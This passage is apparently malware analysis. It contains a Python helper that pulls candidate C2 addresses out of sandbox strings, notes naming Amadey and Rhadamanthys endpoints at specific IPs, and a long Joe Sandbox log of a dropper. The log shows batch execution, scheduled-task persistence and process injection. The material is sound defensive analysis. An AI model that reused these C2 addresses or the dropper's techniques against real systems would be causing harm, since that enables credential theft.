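        _, marker, rest = line.partition(MARK)
        if marker:
            urls.extend(FUSED_RE.findall(rest.strip()))
    return urls


def host_is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def collapse(urls):
    """One record per scheme+host: shared path prefix, variant count, junk suffixes."""
    groups = defaultdict(list)
    for url in urls:
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            continue
        groups[(parts.scheme, parts.netloc.lower())].append(url)

    records = []
    for (scheme, netloc), members in groups.items():
        # Carved variants share the real URL and differ only in trailing bytes,
        # so their longest common prefix recovers the endpoint the sample uses.
        stem = os.path.commonprefix(members)
        parts = urlsplit(members[0])
        try:
            port = parts.port
        except ValueError:
            port = None
        records.append({
            "scheme": scheme,
            "netloc": netloc,
            "stem": stem,
            "variants": len(members),
            "suffixes": sorted({m[len(stem):] for m in members}),
            "ip_literal": host_is_ip(parts.hostname),
            "port": port,
        })
    # IP-literal hosts first: those are the C2 candidates. Named hosts here are
    # certificate, browser or Office strings the stealer read, not infrastructure.
    return sorted(records, key=lambda r: (not r["ip_literal"], r["netloc"]))


def c2_candidates(records):
    return [r["netloc"] for r in records if r["ip_literal"]]


if __name__ == "__main__":
    for rec in collapse(extract_urls(SAMPLE_LINES)):
        flag = "C2?" if rec["ip_literal"] else "   "
        print(f'{flag} {rec["stem"]}  x{rec["variants"]}  suffixes={rec["suffixes"]}')
```

On the sample this yields two IP-literal records: http://91.202.233.180/g88sks2SaM/index.php with suffixes such as ?scr=1 (the index.php?scr= check-in matches the Amadey pattern and the strings come from Dctooux.exe memory), and https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvh from the dialer.exe and OpenWith.exe memory where the RHADAMANTHYS Yara rules matched. The GlobalSign CRL/OCSP hosts belong to the signed Publication file's certificate chain, and the ecosia, yahoo, duckduckgo and support.office.com strings are browser and Office data the stealer touched, so none of them belong on a blocklist. The common-prefix step is a heuristic: for support.office.com it truncates to /article/, which is why the suffix list stays in the record for a human to check.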
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004056DE
Source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_b762d6a8-3
Source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_f8d2a4a0-4
Source: Yara match File source: 16.3.dialer.exe.5080000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.dialer.exe.4e60000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.dialer.exe.5080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.dialer.exe.4e60000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.dialer.exe.4e60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dialer.exe PID: 796, type: MEMORYSTR
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD758630C7 RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor, 20_3_000001BD758630C7
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B638A600 NtAcceptConnectPort, 20_3_00007DF4B638A600
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B638A540 NtAcceptConnectPort, 20_3_00007DF4B638A540
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B638A2B0 NtAcceptConnectPort, 20_3_00007DF4B638A2B0
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B638B088 NtAcceptConnectPort,NtAcceptConnectPort, 20_3_00007DF4B638B088
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B638B154 NtAcceptConnectPort,NtAcceptConnectPort, 20_3_00007DF4B638B154
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6388D94 NtAcceptConnectPort, 20_3_00007DF4B6388D94
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6389F40 NtAcceptConnectPort, 20_3_00007DF4B6389F40
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6388C08 NtAcceptConnectPort, 20_3_00007DF4B6388C08
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6388C90 NtAcceptConnectPort, 20_3_00007DF4B6388C90
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6389CA0 _calloc_dbg,NtAcceptConnectPort, 20_3_00007DF4B6389CA0
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6388A40 NtAcceptConnectPort, 20_3_00007DF4B6388A40
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6389AF4 _malloc_dbg,NtAcceptConnectPort,NtAcceptConnectPort,??3@YAXPEAX@Z, 20_3_00007DF4B6389AF4
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6388AFC NtAcceptConnectPort, 20_3_00007DF4B6388AFC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_2_000001BD75701A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 20_2_000001BD75701A90
Source: C:\Windows\System32\OpenWith.exe Code function: 20_2_000001BD75700AC8 NtAcceptConnectPort,NtAcceptConnectPort, 20_2_000001BD75700AC8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_2_000001BD757015AC NtAcceptConnectPort, 20_2_000001BD757015AC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_2_000001BD75701CD0 RtlAllocateHeap,NtAcceptConnectPort,FindCloseChangeNotification, 20_2_000001BD75701CD0
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFDFE7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 22_2_00CFDFE7
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A6DFE7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 23_2_00A6DFE7
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A6DFE7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 24_2_00A6DFE7
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040352D
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe File created: C:\Windows\Tasks\Dctooux.job Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_0040755C 0_2_0040755C
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_00406D85 0_2_00406D85
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD75861BA6 20_3_000001BD75861BA6
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD75862C3C 20_3_000001BD75862C3C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD75864A38 20_3_000001BD75864A38
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD75865E7C 20_3_000001BD75865E7C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD7586557C 20_3_000001BD7586557C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD758658FC 20_3_000001BD758658FC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD758624F7 20_3_000001BD758624F7
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD7586279C 20_3_000001BD7586279C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6397318 20_3_00007DF4B6397318
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6375BD8 20_3_00007DF4B6375BD8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B637D688 20_3_00007DF4B637D688
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63FB68C 20_3_00007DF4B63FB68C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6448750 20_3_00007DF4B6448750
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64546F8 20_3_00007DF4B64546F8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64483B8 20_3_00007DF4B64483B8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64473A0 20_3_00007DF4B64473A0
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63AC45C 20_3_00007DF4B63AC45C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63DA3F4 20_3_00007DF4B63DA3F4
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64593FC 20_3_00007DF4B64593FC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B636E414 20_3_00007DF4B636E414
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B8534 20_3_00007DF4B63B8534
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63CF4FC 20_3_00007DF4B63CF4FC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64411BC 20_3_00007DF4B64411BC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64541DC 20_3_00007DF4B64541DC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6448238 20_3_00007DF4B6448238
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63AD210 20_3_00007DF4B63AD210
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6373314 20_3_00007DF4B6373314
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63C6F78 20_3_00007DF4B63C6F78
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B6FA0 20_3_00007DF4B63B6FA0
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B643C01C 20_3_00007DF4B643C01C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64040A0 20_3_00007DF4B64040A0
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63CB094 20_3_00007DF4B63CB094
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6443DE0 20_3_00007DF4B6443DE0
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B9E68 20_3_00007DF4B63B9E68
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B637BEC4 20_3_00007DF4B637BEC4
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63ACEC4 20_3_00007DF4B63ACEC4
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6459F40 20_3_00007DF4B6459F40
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B644CF3C 20_3_00007DF4B644CF3C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63D6F20 20_3_00007DF4B63D6F20
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B8BE8 20_3_00007DF4B63B8BE8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6370C44 20_3_00007DF4B6370C44
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B638EC44 20_3_00007DF4B638EC44
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6361BFC 20_3_00007DF4B6361BFC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6447CF4 20_3_00007DF4B6447CF4
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63BA9C4 20_3_00007DF4B63BA9C4
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63C6A10 20_3_00007DF4B63C6A10
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6364A14 20_3_00007DF4B6364A14
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B4A14 20_3_00007DF4B63B4A14
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63C6B20 20_3_00007DF4B63C6B20
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63A17C4 20_3_00007DF4B63A17C4
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63AC7E8 20_3_00007DF4B63AC7E8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63877A0 20_3_00007DF4B63877A0
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63C6834 20_3_00007DF4B63C6834
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B637D850 20_3_00007DF4B637D850
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B7860 20_3_00007DF4B63B7860
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B643780C 20_3_00007DF4B643780C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64478D8 20_3_00007DF4B64478D8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64458AC 20_3_00007DF4B64458AC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63AF954 20_3_00007DF4B63AF954
Source: C:\Windows\System32\OpenWith.exe Code function: 20_2_000001BD75700C5C 20_2_000001BD75700C5C
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D240F0 22_2_00D240F0
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D02263 22_2_00D02263
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D28429 22_2_00D28429
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D24588 22_2_00D24588
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D02A52 22_2_00D02A52
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D28B7B 22_2_00D28B7B
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D28C9B 22_2_00D28C9B
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CE4FE0 22_2_00CE4FE0
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D192A3 22_2_00D192A3
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D05241 22_2_00D05241
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CEF420 22_2_00CEF420
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D075E2 22_2_00D075E2
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D29FE0 22_2_00D29FE0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A940F0 23_2_00A940F0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A72263 23_2_00A72263
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A98429 23_2_00A98429
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A94588 23_2_00A94588
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A72A52 23_2_00A72A52
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A98B7B 23_2_00A98B7B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A98C9B 23_2_00A98C9B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A5EFB0 23_2_00A5EFB0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A54FE0 23_2_00A54FE0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A892A3 23_2_00A892A3
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A75241 23_2_00A75241
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A5F420 23_2_00A5F420
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A775E2 23_2_00A775E2
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A99FE0 23_2_00A99FE0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A59DA0 24_2_00A59DA0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A940F0 24_2_00A940F0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A892A3 24_2_00A892A3
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A72263 24_2_00A72263
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A75241 24_2_00A75241
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A98429 24_2_00A98429
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A94588 24_2_00A94588
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A775E2 24_2_00A775E2
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A72A52 24_2_00A72A52
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A98B7B 24_2_00A98B7B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A98C9B 24_2_00A98C9B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A54FE0 24_2_00A54FE0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A99FE0 24_2_00A99FE0
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: String function: 00A6EAB8 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: String function: 00A6EAA3 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: String function: 00A69510 appears 246 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: String function: 00A8A1F3 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: String function: 00A6EDA2 appears 158 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: String function: 00A6F3E0 appears 89 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: String function: 00A68CF0 appears 47 times
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: String function: 00CFEAB8 appears 35 times
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: String function: 00CFEDA2 appears 81 times
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: String function: 00CFF3E0 appears 46 times
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: String function: 00CF9510 appears 123 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 984
Source: J2NWKU2oJi.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 20.3.OpenWith.exe.1bd7775aad0.12.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.5.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.13.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.9.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.27.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.15.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.7.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.14.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@33/22@1/3
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040352D
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_0040498A
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Spectrum
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
Source: C:\Windows\SysWOW64\dialer.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Mutant created: \Sessions\1\BaseNamedObjects\c3c217c6aa232801b551c5b797f47c88
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe File created: C:\Users\user\AppData\Local\Temp\nsdB815.tmp
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat
Source: J2NWKU2oJi.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
